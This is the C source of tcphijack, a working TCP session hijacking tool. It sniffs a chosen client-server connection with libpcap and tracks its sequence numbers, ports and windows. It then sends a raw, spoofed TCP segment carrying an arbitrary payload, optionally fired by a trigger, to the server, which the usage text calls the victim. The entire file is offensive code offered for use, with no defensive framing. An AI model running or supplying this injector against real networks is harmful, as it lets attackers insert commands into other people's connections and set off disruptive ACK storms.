/*

$Id: tcphijack.c,v 1.6 2003/07/15 17:58:01 peloy Exp $

This program obtains information about a TCP connection, and once it has
enough information about the state of the conversation, i.e. sequence
numbers being used by both the client and the server, window sizes, port
numbers, etc., it sends to the server a crafted TCP segment that can
contain an arbitrary payload.

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ether.h>
#include <pcap.h>
#include <ctype.h>

#include "tcphijack.h"
#include "util.h"

/*
 * How many bytes of data from each packet to capture. This is enough
 * for Ethernet, of course.
 *
 */
#define SNAPLEN 1500

void fire_torpedoes(char *, unsigned);
void process_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
void print_status(void);
void sig_handle_timer(int);
void sig_handle_inter(int);

/* Used to calculate the TCP checksum */
struct pseudo_header {
	u_int32_t saddr;
	u_int32_t daddr;
	u_int16_t protocol;
	u_int16_t len;
};

/* Keeps connection info. (sequence numbers of client and server, etc.) */
struct conn_info {
	u_int16_t client_port;
	u_int32_t client_seq_number;
	u_int32_t server_seq_number;
	u_int16_t client_window;
	u_int16_t server_window;
} conn_info;

char *program_name;

int alarmed;
int signaled;

/* True if we have enough information about the TCP conversation */
int ready_to_fire;

/*
 * For command-line options.
 *
 * All network-related data (IP addresses, TCP ports) is stored in network
 * byte order.
 */
struct {
	char *server_port_name;
	u_int16_t server_port;
	char *client_name;
	u_int32_t client_ip;
	char *server_name;
	u_int32_t server_ip;
	char *interface;
	unsigned long fire_delay;
	struct payload payload;
	struct payload trigger;
} options = {
	NULL, /* server_port_name */
	0, /* server_port */
	NULL, /* client_name */
	0, /* client_ip */
	NULL, /* server_name */
	0, /* server_ip */
	NULL, /* interface */
	0, /* fire_delay */
	{NULL, 0}, /* payload */
	{NULL, 0} /* trigger */
};

#define USAGE \
"\n" \
"Usage: %s [-hv] -c client_name -s server_name -p server_port\n" \
"          [-t trigger_file] [-P payload_file] [-d fire_delay]\n\n" \
"-h: this help\n" \
"-c: Client host name or IP address.\n" \
"-s: Server (victim) host name or IP address.\n" \
"-p: Server TCP port.\n" \
"-t: Trigger file.\n" \
"-P: Payload file. If payload_file is \"-\" then read from stdin.\n" \
"-d: Fire delay.\n" \
"-v: Show version information.\n"

void usage(void)
{
	fprintf(stderr, USAGE, program_name);
	exit(1);
}

int main(int argc, char **argv)
{
	int c;
	struct hostent *host;
	struct servent *service;

	/* libpcap-related variables */
	char errbuf[PCAP_ERRBUF_SIZE];
	pcap_t *pcap;
	int optimize = 1; /* Optimize compilation of pcap expression? */
	bpf_u_int32 netmask = 0; /* for pcap_compile() */
	struct bpf_program fcode;
	char *pcap_expression = NULL;

	if ((program_name = strrchr(argv[0], '/')) )
		program_name++;
	else
		program_name = argv[0];

	while ( (c = getopt(argc, argv, "hvc:s:p:i:t:P:d:") ) != -1)
		switch (c) {
			case 'h':
				usage();
				exit(1);
			case 'v':
				printf("tcphijack version %s\n", VERSION);
				exit(1);
			case 'c':
				if ( (host = gethostbyname(optarg) ) == NULL)
					error(1, "Error resolving hostname.\n");

				/*
				 * Addresses returned by gethostbyname()
				 * are in network byte order, don't forget!!!
			 */
				options.client_ip = *(unsigned *)
							  host->h_addr_list[0];
				options.client_name = optarg;
				break;
			case 's':
				if ( (host = gethostbyname(optarg) ) == NULL)
					error(1, "Error resolving hostname.\n");

				options.server_ip = *(unsigned *)
							  host->h_addr_list[0];
				options.server_name = optarg;
				break;
			case 'p':
				if (isdigit(optarg[0]) )
					options.server_port = htons(atoi(optarg) );
				else {
					if (!(service = getservbyname(optarg, "tcp") ) )
						error(1, "Error resolving service.\n");

					/*
					 * service->s_port is already in network
				 	 * byte order!
				 	 */
					options.server_port = service->s_port;
				}
				options.server_port_name = optarg;
				break;
			case 'i':
				options.interface = optarg;
				break;
			case 'd':
				/* Should make sure number is valid */
				options.fire_delay = atol(optarg);
				break;
			case 't':
				read_payload(optarg, &options.trigger);
				break;
			case 'P':
				/*
				 * If the payload file name is "-" we
				 * read from standard input, if not we
				 * read from a real file.
				 */
				if (strcmp("-", optarg) )
					read_payload(optarg, &options.payload);
				else
					read_payload_from_stdin(&options.payload);
				break;
			default:
				usage();
		}

	/* Make sure we have all the parameters we need */
	if (options.client_name == NULL || options.server_name == NULL ||
	    options.server_port == 0 || options.payload.data == NULL)
		usage();

	if (options.interface == NULL)
		if ( (options.interface = pcap_lookupdev(errbuf) ) == NULL)
			error(1, "%s", errbuf);

	if ( (pcap = pcap_open_live(options.interface, SNAPLEN, 1, 1000,
				    errbuf) ) == NULL)
		error(1, "%s", errbuf);

	debug("libcap version: %d.%d\n\n", pcap_major_version(pcap),
	      pcap_minor_version(pcap) );

	/* We don't want to block on calls to pcap_dispatch() */
	if (pcap_setnonblock(pcap, 1, errbuf) == -1)
		error(1, "%s", errbuf);

	/* We're allocating memory for a few extra bytes here but who cares? */
	if ( (pcap_expression = malloc(strlen(options.client_name) +
				       strlen(options.server_name) +
				       strlen(options.server_port_name) +
				       sizeof("host %s and %s and %s tcp "
					      "port %s") ) ) == NULL)
		error(1, "Can't allocate memory");

	sprintf(pcap_expression, "host %s and %s and tcp port %s",
		options.client_name, options.server_name,
		options.server_port_name);

	if (pcap_compile(pcap, &fcode, pcap_expression, optimize, netmask) < 0)
		error(1, "%s", pcap_geterr(pcap) );
	if (pcap_setfilter(pcap, &fcode) < 0)
		error(1, "%s", pcap_geterr(pcap) );
	pcap_freecode(&fcode);

	fprintf(stderr, "%s: listening on %s.\n"
		"pcap expression is '%s'.\n"
		"Press Control-C once for status, twice to exit.\n",
		program_name, options.interface, pcap_expression);

	free(pcap_expression);

	alarmed = signaled = 0;
	signal(SIGALRM, sig_handle_timer);
	signal(SIGINT, sig_handle_inter);

	while (1) {
		/* Let's get down to business */
		pcap_dispatch(pcap, 1, process_packet, NULL);

		if (signaled) {
			alarm(1);
			signaled = 0;
			print_status();
		}
		if (alarmed) {
			signal(SIGALRM,
			       sig_handle_timer);
			signal(SIGINT,
			       sig_handle_inter);
			alarmed = 0;
		}

		if (ready_to_fire) {
			fprintf(stderr, "We're sync'ed to the TCP conversation."
				" Ready to send payload... ");
			usleep(options.fire_delay);
			fire_torpedoes(options.payload.data,
				       options.payload.len);
			fprintf(stderr, "done!\n"
				"Payload has been sent. Prepare for "
				"network meltdown due to an ACK storm.\n");
			break;
		}
	}

	pcap_close(pcap);

	alarm(0);
	signal(SIGALRM, SIG_DFL);
	signal(SIGINT, SIG_DFL);

	return 0;
}

/*
 * Creates a TCP segment and sends it to the server using the hijacked
 * TCP credentials.
 */
void fire_torpedoes(char *payload, unsigned payload_len)
{
	int sockfd;
	struct sockaddr_in sockaddr;
	char *packet;
	int pkt_size, pseudo_pkt_size;
	struct iphdr *ip;
	struct tcphdr *tcp;
	struct pseudo_header *pseudoh;

	/* Size of what we *will* send */
	pkt_size = sizeof(struct iphdr) + sizeof(struct tcphdr) + payload_len;

	/*
	 * Size of the pseudo_pkt (IP hdr + TCP hdr + TCP payload
	 * (rounded to a word boundary) + pseudo header.
	 */
	pseudo_pkt_size = pkt_size + pkt_size % 2 +
			  sizeof(struct pseudo_header);

	/*
	 * We're allocating a bit more than what we really need. See big
	 * comment below to know why.
	 */
	if ( (packet = (char *) malloc(pseudo_pkt_size) ) == NULL)
		error(1, "Can't allocate memory");

	ip = (struct iphdr *) packet;
	tcp = (struct tcphdr *) ( (char *) ip + sizeof(struct iphdr) );
	/* Pseudo header here? Ha! Tricky tricky. See below why :) */
	pseudoh = (struct pseudo_header *) (packet + pkt_size + pkt_size % 2);

	if ( (sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW) ) == -1)
		error(1, "Can't create socket");

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_port = options.server_port;
	sockaddr.sin_addr.s_addr = options.server_ip;

	bzero(packet, pseudo_pkt_size);

	/*
	 * Set up IP header.
	 *
	 * raw(7) says tot_len and checksum are filled in for us by
	 * the kernel, so we don't worry about those.
	 */
	ip->version = 4;
	ip->ihl = 5;
	ip->ttl = IPDEFTTL;
	ip->protocol = IPPROTO_TCP;
	ip->saddr = options.client_ip;
	ip->daddr = options.server_ip;

	/* TCP header */
	tcp->source = conn_info.client_port;
	tcp->dest = options.server_port;
	tcp->seq = conn_info.client_seq_number;
	tcp->ack_seq = conn_info.server_seq_number;
	tcp->doff = sizeof(struct tcphdr)/4;
	tcp->window = conn_info.client_window;
        
	tcp->psh = 1;
	tcp->ack = 1;

	/* Put the payload in place */
	memcpy( (char *) tcp + sizeof(struct tcphdr), payload, payload_len);

	/*
	 * Set up the pseudo header.
	 *
	 * What I am doing here is a bit tricky: I allocate memory for a
	 * "pseudo packet", that is, IP hdr + TCP hdr + TCP payload
	 * (word-aligned) + the pseudo header defined in RFC793. Then I
	 * setup all the headers (including the pseudo header), put
	 * the payload in place, and then calculate the TCP checksum.
	 * What's different is that I am placing the pseudo header at 
	 * the end (to avoid moving stuff around) instead of at the 
	 * beginning. Addition is commutative so this works.
	 *
	 * Of course, when we send the stuff with sendto(), we just
	 * use IP hdr + TCP hdr + TCP payload. The pseudo header at
	 * the end is not sent.
	 */
	pseudoh->saddr = ip->saddr;
	pseudoh->daddr = ip->daddr;
	pseudoh->protocol = htons(ip->protocol);
	pseudoh->len = htons(pkt_size - sizeof(struct tcphdr) );

	tcp->check = 0;
	tcp->check = in_cksum(tcp, pseudo_pkt_size - sizeof(struct iphdr) );

	if (sendto(sockfd, packet, pkt_size, 0, (struct sockaddr *) &sockaddr,
		   sizeof(struct sockaddr_in) ) == -1)
		error(1, "Couldn't send data");

	free(packet);
}

void process_packet(u_char *unused, const struct pcap_pkthdr *header,
		    const u_char *packet)
{
	struct ether_header *ether;
	struct iphdr *ip;
	struct tcphdr *tcp;
	char *tcp_payload;
	static int first_segment_seen = 0;
	static int more_than_one_conversation = 0;
	u_int16_t client_port;
	int from_server, to_server;
	static int synced_with_client = 0;
	static int synced_with_server = 0;
	int payload_len;
	u_int32_t seq;

	ether = (struct ether_header *) packet;
	ip = (struct iphdr *) (packet + sizeof(struct ether_header) );
	tcp = (struct tcphdr *) ( (char *) ip + ip->ihl*4);
	tcp_payload = (char *) tcp + tcp->doff*4;

	/* True if packet comes from the server */
	from_server = ip->saddr == options.server_ip &&
		      tcp->source == options.server_port;

	/* True if packet goes to the server */
	to_server = ip->daddr == options.server_ip &&
		    tcp->dest == options.server_port;

	/*
	 * Does this packet comes from the server and from the right
	 * port, or goes to the server and to the right port?
	 */
	if (from_server || to_server) {
		/* Yes, the packet comes from, or goes to, the server */

		/* Determine the ephemeral port used by the client */
		client_port = from_server ? tcp->dest : tcp->source;

		if (first_segment_seen &&
		    client_port != conn_info.client_port) {
			if (!more_than_one_conversation) {
				fprintf(stderr,
					"More than one TCP conversation; "
					"ignoring all but from TCP %u to "
					"TCP %u.\n",
					ntohs(conn_info.client_port),
					ntohs(options.server_port) );
				more_than_one_conversation = 1;
			}
		} else {
			payload_len = ntohs(ip->tot_len) - ip->ihl*4 -
				      tcp->doff*4;
			seq = htonl(ntohl(tcp->seq) + payload_len + tcp->syn +
				    tcp->fin + tcp->rst);

			if (from_server) {
				/* Packet comes from server */
				conn_info.client_port = tcp->dest;
				conn_info.server_window = tcp->window;
				conn_info.server_seq_number = seq;
				synced_with_server = 1;
			} else {
				/* Packet goes to server */
				conn_info.client_port = tcp->source;
				conn_info.client_window = tcp->window;
				conn_info.client_seq_number = seq;
				synced_with_client = 1;
			}

			first_segment_seen = 1;
		}
	}

	if (synced_with_client & synced_with_server) {
		if (options.trigger.data) {
			if (!memcmp(tcp_payload, options.trigger.data,
			    options.trigger.len) )
				ready_to_fire = 1;
		} else
			ready_to_fire = 1;
	}
}

void print_status(void)
{
	fprintf(stderr, "Client port %u, client seq. #: %u, server seq. #: "
		"%u (%s)\n",
		ntohs(conn_info.client_port),
		ntohl(conn_info.client_seq_number), 
		ntohl(conn_info.server_seq_number),
		ready_to_fire ? "sync'ed" : "not sync'ed");
}

void sig_handle_timer(int sig)
{
	alarmed = 1;
}
			
void sig_handle_inter(int sig)
{
	signaled = 1;
	signal(SIGINT, SIG_DFL);
}
